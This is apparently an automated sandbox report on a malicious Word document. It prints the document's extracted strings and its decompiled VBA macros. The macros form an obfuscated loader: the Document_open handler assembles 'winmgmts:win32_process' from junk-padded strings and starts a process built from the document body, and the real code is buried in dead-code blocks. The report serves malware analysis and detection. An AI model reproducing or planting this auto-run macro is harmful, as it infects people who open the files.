"KtidJsSE.paErC.KUloBYBF"
"ghtMtA.YUxUI.QTlVpGJg"
"nfhAABBEB.VeDeFP.sKzKuBBC"
PViTAAED
DvDefEl
"buFGCCXJ.QSbaYn.wJSsDBFER"
"yxpQHDBA.zkorIAiHS.StjAKJ"
QPqDJP
RjWVCNKEI
nMdUMleFB
'xTUBS
"ooZqmESHe.BQQQEBd.iaBAnAZ"
vApdD:
HBYVV
"jbKPlXCDh.siqMFp.byKaIAlXB"
"gQEGCB.HVmcrDI.zGpVIUABC"
'HtmXmvT
akWgAQAIC
bRMAl
ugNdBHTqJ
"xlsUIHJ.HlAbuCnVB.fhPbXCDLR"
"INzOLEyBR.lEZxQ.rjitI"
lutoTsPkH
"ajyVJ.ohKLAGtFI.fshBTGEF"
'MpbLCImG
"YJiQHG.tumcISEI.XTUZB"
XonQB
'pIUaGf
UxlgEAI:
'pMvRFAK
RjWVCNKEI:
GDZZqGDJ
'WmUZOHEM
vAZQiJB
"OEqrJ.wqhoDAHQ.xAflFS"
'RmbpI
oheeCHI
"NpVFCB.MCDxG.UpDmKPxpp"
"YeMqlJ.uCiqCNS.WjgigV"
pUmEYEJA
"VmdtNNT.mylsHGACs.cOGFA"
"NvrZDA.DdShRHFtD.BErohw"
rKyfgFyfq
RtfzGtt:
'OTTxPImEN
"NMdOHH.BANiFHPHQ.VGJSDA"
String
iKyOGBLAy
'HGHRiZB
RKPFYlFb
HvnISHlCE
"qDBKOE.hcDCJ.BVRxGIBBJ"
vApdD
"PuNKnKt.sBhbCCuE.ikMJIZFm"
TrdMzBDZJ
"krLiFHpF.eVBFvd.JWHZCso"
'YwYKGv
"byAGVzBQ.OjVafcB.yoXPx"
'OnFFAqHWH
QSISC:
"FOxJQVBLi.dDrmJG.osuuaBIDb"
"gThcAJ.ZKJdpcm.tjPbu"
"UtEKe.Ylfjhi.utxEPXwo"
pUmEYEJA:
"yycyIZBxI.LLMLGP.MSuNHDBEY"
"uxKEC.pIZoJF.srBaREc"
xjadBeU
"BOoAgEz.NoSsFEBBB.RueFu"
taucEJAED
"ohhFBJjA.uWdjpFFGk.FVdrHAB"
XUDHDiKId
vmJnC:
'XLWzECHi
'KDSQqD
"EnJMG.KCVSIHB.BJiWBGLWG"
"qQeaRICAm.KgqZFRWRC.cuPrnUFxk"
'mRJNaEGtF
"DrttFCz.lpfOt.UeCjC"
"MAIbDAaJ.BfRJzI.vKbPTLCD"
"rFDaOyDH.hZniGGDBp.fHUVY"
vAZQiJB:
ojGsFHEEF:
"vATeCIgJI.FpiaIJIiJ.MmplJ"
"RdpGJIBOF.swjFv.IeAbvID"
"NxkCf.PoyHSN.naAFIEIY"
"DbnKMvMAH.jHcdBADv.EGxUCAADs"
UaqRCIH:
vIDVA
"vPtDJGH.uqPgaLD.WNoez"
Error
"umSoGWOGJ.uhkWJDAQ.ACsLFB"
"MxRtxH.yGeKFDG.nRzlA"
'gtpnJOwLd
Attribute
"imfriCGFb.tYNKga.WYPiZwEHH"
"fRHrGnFp.uWltAIHCI.WYWvIWr"
'XKxXUoJG
Close
RtfzGtt
tWXiIJDnz
bgosIAI
"fYqreeAI.UbBaCOpIW.ibhMgA"
vmJnC
Function
GKsgQaAGE
'FpwxECGKS
loQNDFH
OahWDBD
"HvKRFHh.hsVhH.bZBNF"
hTTQEJEAC:
yPqfxADJ
RBFRbHBg
nMdUMleFB:
"YWibCdgEJ.NDhrE.WdBFBFE"
zNPNECkYX:
'gfQxcwC
ojGsFHEEF
"CaxOH.vXPgFHoe.agirIF"
"HJmgHkBC.MyfFGEi.rTJlw"
DiIIF
TOMwIrgJ
"aRotQ.FHGaEABuI.JNHZBdF"
HUPVnvFAA
KMChE

VBA Code

Attribute VB_Name = "Dwztpwkmgv8q9o28r"
    Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
   GoTo GKsgQaAGE
Dim NmmcJMB As String 'POyDeJ
Open "dVMtDJ.ecCLuZ.vNWxUB" For Binary As 154
Open "GmQlB.gLlkBCq.ohnmP" For Binary As 154
Open "asHdBA.RNUGfJo.UEIiMmoM" For Binary As 154
Put #154, , NmmcJMB
Close #154
GKsgQaAGE:
GoTo fIjVkJj
Dim jFUMUmIIJ As String 'NskblDD
Open "fRHrGnFp.uWltAIHCI.WYWvIWr" For Binary As 146
Open "qQeaRICAm.KgqZFRWRC.cuPrnUFxk" For Binary As 146
Open "ShUECDIR.otrtDOGBA.OugaBFHlJ" For Binary As 146
Put #146, , jFUMUmIIJ
Close #146
fIjVkJj:
GoTo hTTQEJEAC
Dim OybSq As String 'kEafA
Open "umMOXxmA.SfYuGDN.ueONFAEFD" For Binary As 227
Open "eIQhLAGS.forvJhMB.LGyFI" For Binary As 227
Open "TifoEDtFB.fukVJAvIS.dlciFGDA" For Binary As 227
Put #227, , OybSq
Close #227
hTTQEJEAC:
HBYVV = ""
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace (Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
   GoTo mJsZBCEFo
Dim jUDsXM As String 'gtpnJOwLd
Open "myDIGCFHC.cgXWyuEFC.OybuGU" For Binary As 131
Open "EnJMG.KCVSIHB.BJiWBGLWG" For Binary As 131
Open "kfSFYoEHi.aXUIAvAP.dswKhikA" For Binary As 131
Put #131, , jUDsXM
Close #131
mJsZBCEFo:
GoTo BOzmWI
Dim CJeaFB As String 'jtrvFEWLD
Open "dfOYHJLF.uBXVkGE.ghpJGB" For Binary As 124
Open "MTfEVUDIQ.DlrvrPEB.PgggwwMD" For Binary As 124
Open "YHUtVQCI.AyvDaAH.JsZULCUu" For Binary As 124
Put #124, , CJeaFB
Close #124
BOzmWI:
GoTo kPMjtUB
Dim eVbTfoFi As String 'xTUBS
Open "eXoWdB.HSupDA.oXRxAS" For Binary As 149
Open "nmuAl.yeRQHDs.UqyoFI" For Binary As 149
Open "nzFmWEVE.ZFvEGsIFD.mjIMGVD" For Binary As 149
Put #149, , eVbTfoFi
Close #149
kPMjtUB:
End Function
Function Tujor4m47ob()
On Error Resume Next
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
   GoTo aektCnFI
Dim jaJUkAFeG As String 'cwxgFSS
Open "DbnKMvMAH.jHcdBADv.EGxUCAADs" For Binary As 201
Open "gQEGCB.HVmcrDI.zGpVIUABC" For Binary As 201
Open "shyujG.RFwdH.VPRoIX" For Binary As 201
Put #201, , jaJUkAFeG
Close #201
aektCnFI:
GoTo RtfzGtt
Dim WWCACxG As String 'mRJNaEGtF
Open "vATeCIgJI.FpiaIJIiJ.MmplJ" For Binary As 153
Open "MOIhAmCn.UAJXCE.BwsiJS" For Binary As 153
Open "NpVFCB.MCDxG.UpDmKPxpp" For Binary As 153
Put #153, , WWCACxG
Close #153
RtfzGtt:
GoTo QSISC
Dim qVbhwsATQ As String 'HGHRiZB
Open "xaihM.LJwjAQQQZ.DJoqHIrg" For Binary As 188
Open "HvKRFHh.hsVhH.bZBNF" For Binary As 188
Open "XqxxqFG.ulGKCnC.YQRUOJ" For Binary As 188
Put #188, , qVbhwsATQ
Close #188
QSISC:
sng2 = "qq)(" + "s2)(pq" +  "q)(s2)("
F7_if4svnte = "qq)(s" +  "2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" +  "(sqq)(s2)(sqq)(s2)(qq)(s2)("
   GoTo nelsfX
Dim MURoCFiFB As String 'XLWzECHi
Open "JvOnPcH.fUHBCGVtD.MqiHAD" For Binary As 133
Open "buFGCCXJ.QSbaYn.wJSsDBFER" For Binary As 133
Open "PBmiWVMA.fEuTBGH.ZgHREKHJC" For Binary As 133
Put #133, , MURoCFiFB
Close #133
nelsfX:
GoTo huGtwmS
Dim taucEJAED As String 'KDSQqD
Open "QlyBbpIG.CHPUEZ.BAQVDHmJ" For Binary As 59
Open "CaxOH.vXPgFHoe.agirIF" For Binary As 59
Open "yzpwxsD.ucWxvGt.QXFsbDn" For Binary As 59
Put #59, , taucEJAED
Close #59
huGtwmS:
GoTo DvDefEl
Dim TfsIR As String 'hnOfJN
Open "exIqDH.MwmVE.YEfbFIJ" For Binary As 176
Open "wMlGriIC.YqLZwG.IfqJAT" For Binary As 176
Open "qSgyRp.VhQHDEA.ggPyFQd" For Binary As 176
Put #176, , TfsIR
Close #176
DvDefEl:
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" +  "2)(inqq)(s2)(3qq)(s" +  "2)(2qq)(s2)(_qq)(s2)("
   GoTo vAZQiJB
Dim xuHzWGDG As String 'RmbpI
Open "ZRfmBGEw.yZYjFMHP.ckDWe" For Binary As 141
Open "gbBrhF.kCOlJnAJ.GLIdD" For Binary As 141
Open "MBUUAw.NbPECAix.UyuHH" For Binary As 141
Put #141, , xuHzWGDG
Close #141
vAZQiJB:
GoTo nmWOSYyF
Dim QPqDJP As String 'HLdYiFJHC
Open "LwmxHCmp.NFrlTBA.VFGtT" For Binary As 149
Open "ofEFEBH.KSyFFWK.TKfABI" For Binary As 149
Open "gyhfb.ipvwBrE.vVquOxU" For Binary As 149
Put #149, , QPqDJP
Close #149
nmWOSYyF:
GoTo tWXiIJDnz
Dim PJjuJ As String 'gmzmA
Open "RkYwxnJEW.rgdTkJfGF.zantCJ" For Binary As 152
Open "yxpQHDBA.zkorIAiHS.StjAKJ" For Binary As 152
Open "nbYwYEWhC.CeOFDlC.VvhoEHt" For Binary As 152
Put #152, , PJjuJ
Close #152
tWXiIJDnz:
R67uawfvzvw = "wqq)(s2" +  ")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
   GoTo SyZjrEHAG
Dim UjcXr As String 'MpbLCImG
Open "WanlBnGn.vOkxHB.FUNtGuCCw" For Binary As 52
Open "krLiFHpF.eVBFvd.JWHZCso" For Binary As 52
Open "umSoGWOGJ.uhkWJDAQ.ACsLFB" For Binary As 52
Put #52, , UjcXr
Close #52
SyZjrEHAG:
GoTo uXAHJydE
Dim HpQEA As String 'THrtIBIAD
Open "rRdnUjHbw.iDplGAz.PjQxp" For Binary As 211
Open "TXrkTGK.FbNkBCE.nGfkHCJj" For Binary As 211
Open "fnehJF.MwLyDGIC.meixAlF" For Binary As 211
Put #211, , HpQEA
Close #211
uXAHJydE:
GoTo PYuemWAC
Dim DiIIF As String 'OPurH
Open "nXywAI.gJpfbBO.HipQCDYJJ" For Binary As 129
Open "SZqPCAC.pZyeTtAF.ORiEHGH" For Binary As 129
Open "OrYPhm.tEuCH.YaWnFsI" For Binary As 129
Put #129, , DiIIF
Close #129
PYuemWAC:
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
   GoTo UxlgEAI
Dim rFHJy As String 'zHXJG
Open "CRkMC.mCwoR.dFnkA" For Binary As 185
Open "jrtAEKE.uIVzu.jqMwAC" For Binary As 185
Open "HJmgHkBC.MyfFGEi.rTJlw" For Binary As 185
Put #185, , rFHJy
Close #185
UxlgEAI:
GoTo vIDVA
Dim GWbqA As String 'UxHBcFQ
Open "YeMqlJ.uCiqCNS.WjgigV" For Binary As 159
Open "DrttFCz.lpfOt.UeCjC" For Binary As 159
Open "AscqIIYrJ.JeGiiSE.mYjmAABJ" For Binary As 159
Put #159, , GWbqA
Close #159
vIDVA:
GoTo lutoTsPkH
Dim nmwGcQ As String 'OTTxPImEN
Open "iVnKJ.YEevQ.GWucCAFI" For Binary As 217
Open "NxgIP.TARFAADew.NyFRA" For Binary As 217
Open "NvrZDA.DdShRHFtD.BErohw" For Binary As 217
Put #217, , nmwGcQ
Close #217
lutoTsPkH:
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
   GoTo QdQmIDzTC
Dim akWgAQAIC As String 'rMAWIEja
Open "lHZGGIbGc.iaJoCAFB.VNeICCIax" For Binary As 206
Open "RdpGJIBOF.swjFv.IeAbvID" For Binary As 206
Open "IyaYxC.BTSLmDJ.jgOiOIDGT" For Binary As 206
Put #206, , akWgAQAIC
Close #206
QdQmIDzTC:
GoTo zNPNECkYX
Dim JZcLuFA As String 'VtNiGGmD
Open "FOxJQVBLi.dDrmJG.osuuaBIDb" For Binary As 125
Open "gWUYvHr.ZTgQT.DNujcI" For Binary As 125
Open "BwDJADFsC.LJFNLbb.daiRJD" For Binary As 125
Put #125, , JZcLuFA
Close #125
zNPNECkYX:
GoTo vmJnC
Dim OahWDBD As String 'zMMkH
Open "xINyH.PTxmCYVEI.ZjICHD" For Binary As 167
Open "ywqUjrAcG.nStXYBIsJ.CUmPFEHE" For Binary As 167
Open "gThcAJ.ZKJdpcm.tjPbu" For Binary As 167
Put #167, , OahWDBD
Close #167
vmJnC:
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
   GoTo sFyhnDDx
Dim PCRIYp As String 'pMvRFAK
Open "sNdvIH.EwGNvsEC.ALrzVIC" For Binary As 203
Open "sClXGS.DwVOXN.VhyWJEJ" For Binary As 203
Open "UtEKe.Ylfjhi.utxEPXwo" For Binary As 203
Put #203, , PCRIYp
Close #203
sFyhnDDx:
GoTo RKPFYlFb
Dim pRdXtubFT As String 'gfQxcwC
Open "QsQGaIC.AwxeAW.xtrtFCFdF" For Binary As 158
Open "TxVEJ.iXjAEimg.TDSdLDOA" For Binary As 158
Open "ThIgAFZBB.NbVEqpw.YsHvp" For Binary As 158
Put #158, , pRdXtubFT
Close #158
RKPFYlFb:
GoTo vmlpJOA
Dim HUPVnvFAA As String 'WkgKBIH
Open "rxhFoG.AShLFJDl.zybsiV" For Binary As 191
Open "UDZsNIDG.VfdgH.MBiBLq" For Binary As 191
Open "MAIbDAaJ.BfRJzI.vKbPTLCD" For Binary As 191
Put #191, , HUPVnvFAA
Close #191
vmlpJOA:
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
   GoTo PViTAAED
Dim KMChE As String 'tdXnByPb
Open "IJzlC.SoCtG.TPbXhBKrm" For Binary As 94
Open "GAzJGdUeC.SjRAxF.SebwGKPCv" For Binary As 94
Open "BCyTAdFeI.MvwOCAI.YKhJFAApg" For Binary As 94
Put #94, , KMChE
Close #94
PViTAAED:
GoTo RBFRbHBg
Dim DqWYFGG As String 'UDjSMF
Open "AQlXBCb.vtUJfcFG.uXigEO" For Binary As 214
Open "ZDHjAEWl.doArj.lPBxKCC" For Binary As 214
Open "aGQoDDk.VZsZQhDoP.fnRuG" For Binary As 214
Put #214, , DqWYFGG
Close #214
RBFRbHBg:
GoTo SFgGtIlpD
Dim GDZZqGDJ As String 'FpwxECGKS
Open "gMgqJJ.sEwvhb.SuXWmVIA" For Binary As 106
Open "nrzOZDa.ZzIiFFSE.VjWVF" For Binary As 106
Open "vPEJJqH.jFzYA.AlzwaDJBw" For Binary As 106
Put #106, , GDZZqGDJ
Close #106
SFgGtIlpD:
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
   GoTo xjadBeU
Dim nmTHypHA As String 'DVUNjGqL
Open "cURDDF.pLPgGlcD.FYnPCELJI" For Binary As 127
Open "HvCbXDBq.RUZaGEzC.bgBsAAd" For Binary As 127
Open "vBsfDkB.xlZBIMF.TDVEEFQJ" For Binary As 127
Put #127, , nmTHypHA
Close #127
xjadBeU:
GoTo wWUQDA
Dim AEazvYO As String 'WmUZOHEM
Open "DMNSECHJb.bbxJxAEDq.LnJxA" For Binary As 55
Open "gFPXD.IEgaqJz.YAHsC" For Binary As 55
Open "lEilB.QvPXD.cMfWCJO" For Binary As 55
Put #55, , AEazvYO
Close #55
wWUQDA:
GoTo xFoIFC
Dim YFLpuEi As String 'WteBl
Open "nfhAABBEB.VeDeFP.sKzKuBBC" For Binary As 203
Open "wXXiJHf.TCBShGYr.DNKsHT" For Binary As 203
Open "mQnnE.bmZQGSEA.AGkxGzCHX" For Binary As 203
Put #203, , YFLpuEi
Close #203
xFoIFC:
   GoTo QGPRjInP
Dim WKiiJDVJq As String 'yoOwJD
Open "qyXGFD.Mnoog.UnkFG" For Binary As 109
Open "HKwtB.rBrtHJf.lLgDD" For Binary As 109
Open "AhHYjIBs.vNObEAAJ.IRARxrx" For Binary As 109
Put #109, , WKiiJDVJq
Close #109
QGPRjInP:
GoTo AsvyFHHC
Dim FymJHI As String 'DYLTWEF
Open "sLYJBI.TQZluJA.LgcFP" For Binary As 175
Open "ojxyHHEP.vXfQD.OBTMB" For Binary As 175
Open "AlRZo.MXGVMDVDJ.FRGRQ" For Binary As 175
Put #175, , FymJHI
Close #175
AsvyFHHC:
GoTo iKyOGBLAy
Dim zqgnJAxpy As String 'HZaLGI
Open "aKrxWJUr.NfKHtA.lWiIG" For Binary As 150
Open "byAGVzBQ.OjVafcB.yoXPx" For Binary As 150
Open "fSJtFAEEA.yqTyACLA.PWwsTDwIy" For Binary As 150
Put #150, , zqgnJAxpy
Close #150
iKyOGBLAy:
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
   GoTo pUmEYEJA
Dim eRlMmLKx As String 'rpaKAI
Open "YeeTCIHp.dBrFLg.qZpkDJ" For Binary As 209
Open "ghtMtA.YUxUI.QTlVpGJg" For Binary As 209
Open "jevGKBz.ZpfmEFvDM.fkIcAGBII" For Binary As 209
Put #209, , eRlMmLKx
Close #209
pUmEYEJA:
GoTo CUZigB
Dim rJseFDK As String 'fQYhA
Open "qDBKOE.hcDCJ.BVRxGIBBJ" For Binary As 207
Open "ENMCE.LcqmMLm.kcwYHCV" For Binary As 207
Open "UaWqrCaA.UYSnZCG.urBVH" For Binary As 207
Put #207, , rJseFDK
Close #207
CUZigB:
GoTo XonQB
Dim TOMwIrgJ As String 'pIUaGf
Open "ohhFBJjA.uWdjpFFGk.FVdrHAB" For Binary As 189
Open "OEqrJ.wqhoDAHQ.xAflFS" For Binary As 189
Open "YWibCdgEJ.NDhrE.WdBFBFE" For Binary As 189
Put #189, , TOMwIrgJ
Close #189
XonQB:
   GoTo rKyfgFyfq
Dim cztpFp As String 'YwYKGv
Open "ajyVJ.ohKLAGtFI.fshBTGEF" For Binary As 138
Open "imfriCGFb.tYNKga.WYPiZwEHH" For Binary As 138
Open "KuhBGApcv.ojBZUIIEX.HJefxELF" For Binary As 138
Put #138, , cztpFp
Close #138
rKyfgFyfq:
GoTo kvkwNE
Dim ugNdBHTqJ As String 'HtmXmvT
Open "aRotQ.FHGaEABuI.JNHZBdF" For Binary As 202
Open "uMBDk.VxvrDae.NYTTAIAe" For Binary As 202
Open "VWYJvN.lGHiEC.AlsbD" For Binary As 202
Put #202, , ugNdBHTqJ
Close #202
kvkwNE:
GoTo UaqRCIH
Dim bgosIAI As String 'hAsNYHIgo
Open "rFDaOyDH.hZniGGDBp.fHUVY" For Binary As 134
Open "KrSuJCFF.aeIBC.hRLXIc" For Binary As 134
Open "PuNKnKt.sBhbCCuE.ikMJIZFm" For Binary As 134
Put #134, , bgosIAI
Close #134
UaqRCIH:
End Function
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
   GoTo oheeCHI
Dim iVJGnsW As String 'OEDeu
Open "GjkaJIH.peZmtHtGM.gypgP" For Binary As 140
Open "YBkxHBECF.YlsyXD.WgzGtH" For Binary As 140
Open "FbjEBIGb.HVqybIN.uhHkRpG" For Binary As 140
Put #140, , iVJGnsW
Close #140
oheeCHI:
GoTo yPqfxADJ
Dim qTLRXCv As String 'wvoHE
Open "fYqreeAI.UbBaCOpIW.ibhMgA" For Binary As 207
Open "yycyIZBxI.LLMLGP.MSuNHDBEY" For Binary As 207
Open "NxkCf.PoyHSN.naAFIEIY" For Binary As 207
Put #207, , qTLRXCv
Close #207
yPqfxADJ:
GoTo bRMAl
Dim qpTUMG As String 'FVzXiA
Open "klmCEx.LHwvHEV.nvbNG" For Binary As 210
Open "xlsUIHJ.HlAbuCnVB.fhPbXCDLR" For Binary As 210
Open "bpgkEyAEz.XZZWFRiW.DWsAgQ" For Binary As 210
Put #210, , qpTUMG
Close #210
bRMAl:
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
   GoTo TrdMzBDZJ
Dim uhqsGuAB As String 'LyQczqYvJ
Open "XcQyeAFEH.OxwUTAF.OjTNwA" For Binary As 178
Open "QEkjG.mlBEHrAJ.IdkPDI" For Binary As 178
Open "INzOLEyBR.lEZxQ.rjitI" For Binary As 178
Put #178, , uhqsGuAB
Close #178
TrdMzBDZJ:
GoTo loQNDFH
Dim RBLslko As String 'BQaqZjA
Open "uxKEC.pIZoJF.srBaREc" For Binary As 135
Open "BOoAgEz.NoSsFEBBB.RueFu" For Binary As 135
Open "tPaIGWt.sNypwJ.uiODJJJA" For Binary As 135
Put #135, , RBLslko
Close #135
loQNDFH:
GoTo RjWVCNKEI
Dim XUDHDiKId As String 'DfsDD
Open "YJiQHG.tumcISEI.XTUZB" For Binary As 141
Open "QQMFr.jWYtE.SdCsJ" For Binary As 141
Open "PVgOlGBl.pUbOHFCY.MgaMJSI" For Binary As 141
Put #141, , XUDHDiKId
Close #141
RjWVCNKEI:
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
   GoTo nMdUMleFB
Dim SLJdkBII As String 'FWRUNdgHJ
Open "FVMJB.OanJEHHDG.BFKlGjECA" For Binary As 163
Open "cDYsKH.cikTAY.Ezyuc" For Binary As 163
Open "uIxkJo.MWxKvDHC.vvgQEXJDH" For Binary As 163
Put #163, , SLJdkBII
Close #163
nMdUMleFB:
GoTo mdgvjEeAC
Dim LbhGD As String 'XKxXUoJG
Open "jbKPlXCDh.siqMFp.byKaIAlXB" For Binary As 192
Open "ooZqmESHe.BQQQEBd.iaBAnAZ" For Binary As 192
Open "SgKEFsHED.atIRE.nAXgHCyr" For Binary As 192
Put #192, , LbhGD
Close #192
mdgvjEeAC:
GoTo ojGsFHEEF
Dim IkDkKCv As String 'KClXGffED
Open "stscCEAUT.PziCFDmD.xEGKXRGTE" For Binary As 106
Open "fzpZGsD.rsWZI.nhqNVH" For Binary As 106
Open "MxRtxH.yGeKFDG.nRzlA" For Binary As 106
Put #106, , IkDkKCv
Close #106
ojGsFHEEF:
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
   GoTo aeMpCH
Dim ClyWRG As String 'mYWbL
Open "eAdUlJHj.rMYTRAF.IMwLCCCT" For Binary As 170
Open "gaJjDP.jqoPjEzCA.sqvbMGBp" For Binary As 170
Open "kwgqDdCZ.UJhzPcBmS.DIZSAkBG" For Binary As 170
Put #170, , ClyWRG
Close #170
aeMpCH:
GoTo BHZQG
Dim HvnISHlCE As String 'ffPuICmH
Open "DySslFhhA.wiGJV.ChxbEmyAk" For Binary As 205
Open "NMdOHH.BANiFHPHQ.VGJSDA" For Binary As 205
Open "KtidJsSE.paErC.KUloBYBF" For Binary As 205
Put #205, , HvnISHlCE
Close #205
BHZQG:
GoTo vApdD
Dim vuEJPy As String 'OnFFAqHWH
Open "VmdtNNT.mylsHGACs.cOGFA" For Binary As 167
Open "vPtDJGH.uqPgaLD.WNoez" For Binary As 167
Open "dOeICmG.rNLBfGjIw.auFLHQY" For Binary As 167
Put #167, , vuEJPy
Close #167
vApdD:
End Function

VBA File Name: J7lmk7xauqcok9, Stream Size: 683

General
Stream Path:	Macros/VBA/J7lmk7xauqcok9
VBA File Name:	J7lmk7xauqcok9
Stream Size:	683
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 1b cf 26 ba 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "J7lmk7xauqcok9"`

VBA File Name: T6dwlv_ivpoiq2, Stream Size: 1109

General
Stream Path:	Macros/VBA/T6dwlv_ivpoiq2
VBA File Name:	T6dwlv_ivpoiq2
Stream Size:	1109
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 1b cf f7 ce 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "T6dwlv_ivpoiq2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Tujor4m47ob
End Sub

VBA File Name: UserForm1, Stream Size: 1158

General
Stream Path:	Macros/VBA/UserForm1
VBA File Name:	UserForm1
Stream Size:	1158
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 1b cf cf 59 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{52A43B34-A9C8-4F96-A958-A43ACC1599CB}{AFB796FE-6EB6-46FD-8BFC-3D728DC178CD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm2, Stream Size: 1159

General
Stream Path:	Macros/VBA/UserForm2
VBA File Name:	UserForm2
Stream Size:	1159
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . M Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 1b cf 4d 51 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Base
VB_Name
